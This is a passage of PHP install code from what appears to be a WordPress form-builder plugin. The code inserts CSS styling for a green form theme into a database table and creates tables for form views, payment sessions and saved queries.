rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(37, \'Theme 10 green\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D8E5DB;\r\nborder: 1px solid #007616;\r\nmargin-bottom: 10px;\r\ncolor: #007616;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/03/next_hoverbg.png) url([SITE_ROOT]/images/01/03/previous_hover.png) url([SITE_ROOT]/images/01/03/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: "";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/03/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\ncolor:#fff;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\nbackground: #006C14 ;\r\nbackground: -moz-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -webkit-gradient(linear, left top, right top, color-stop(0%, #006C14 ), color-stop(20%, #018819 ), color-stop(80%, #018819 ), color-stop(100%, #006C14 ));\r\nbackground: -webkit-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -o-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -ms-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: linear-gradient(to right, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\ncursor: pointer;\r\nfont-size: 17px;\r\nborder-radius: 7px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 1px solid #0DBB2C;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #006C14;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #D8E5DB;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 1px solid #006C14;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #006312 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #006312 ), color-stop(20%, #047519 ), color-stop(80%, #057C1C ), color-stop(100%, #069140 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\ncolor:#fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\ninput[type="password"]:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #006C14;\r\n	cursor: pointer;\r\n	background-color: #7FB589;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #006C14;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #008118 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #008118 ), color-stop(67%, #089723 ), color-stop(100%, #069C22 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #008118 0%, #089723 67%, #069C22 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #7FB589;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #069B22;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
  }

  $formmaker_views = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_views` (
    `form_id` int(11) NOT NULL,
    `views` int(50) NOT NULL,
    PRIMARY KEY (`form_id`)
  ) DEFAULT CHARSET=utf8;";
  $wpdb->query($formmaker_views);

  $formmaker_sessions = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_sessions` (
    `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
    `form_id` int(20) NOT NULL,
    `group_id` int(20) NOT NULL,
    `ip` varchar(20) NOT NULL,
    `ord_date` datetime NOT NULL,
    `ord_last_modified` datetime NOT NULL,
    `status` varchar(50) NOT NULL,
    `full_name` varchar(100) NOT NULL,
    `email` varchar(50) NOT NULL,
    `phone` varchar(50) NOT NULL,
    `mobile_phone` varchar(255) NOT NULL,
    `fax` varchar(255) NOT NULL,
    `address` varchar(300) NOT NULL,
    `paypal_info` text NOT NULL,
    `without_paypal_info` text NOT NULL,
    `ipn` varchar(20) NOT NULL,
    `checkout_method` varchar(20) NOT NULL,
    `tax` float NOT NULL,
    `shipping` float NOT NULL,
    `shipping_type` varchar(200) NOT NULL,
    `read` int(11) NOT NULL,
    `total` float NOT NULL,
    `currency` varchar(24) NOT NULL,
    PRIMARY KEY (`id`)
  ) DEFAULT CHARSET=utf8;";
  $wpdb->query($formmaker_sessions);
  
  $formmaker_query = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_query` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `form_id` int(11) NOT NULL,
    `query` text NOT NULL,
    `details` text NOT NULL,
    PRIMARY KEY (`id`)
  ) ENGINE=InnoDB  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1;";
